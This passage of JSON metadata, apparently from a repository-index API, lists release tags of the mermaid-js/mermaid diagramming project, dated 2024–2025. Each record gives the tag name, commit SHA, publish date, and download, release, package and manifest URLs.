2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js